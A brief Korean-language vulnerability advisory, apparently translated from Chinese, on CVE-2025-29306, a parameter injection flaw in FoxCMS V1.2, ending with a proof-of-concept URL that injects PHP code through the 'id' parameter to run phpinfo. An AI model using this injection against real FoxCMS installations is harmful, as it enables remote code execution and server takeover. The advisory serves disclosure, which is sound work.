
FoxCMS V1.2의 서버 매개변수 주입 취약점인 CVE-2025-29306에 대한 개념 증명 익스플로잇으로, 조작된 HTTP 요청을 통한 원격 코드 실행을 가능하게 합니다.
FOXCMS黔狐 콘텐츠 관리 시스템 서비스 매개변수 주입 취약점
一、취약점 소개
FoxCMS는 무료로 상업적 사용이 가능한 오픈소스 웹사이트 관리 시스템으로, PHP+MySQL 아키텍처를 사용합니다. FOXCMS黔狐 콘텐츠 관리 시스템에는 서비스 매개변수 주입 취약점이 존재하며, 공격자는 이 취약점을 이용해 서버 제어권을 획득할 수 있습니다.
二、취약점 영향
FOXCMS黔狐 콘텐츠 관리 시스템 V1.2
三、재현 과정
POC http://xx/images/index.html?id=%24{%40print(phpinfo())} Poc를 입력하여 취약점 페이지에 접근하면 phpinfo 명령 실행 후의 정보가 표시됩니다.
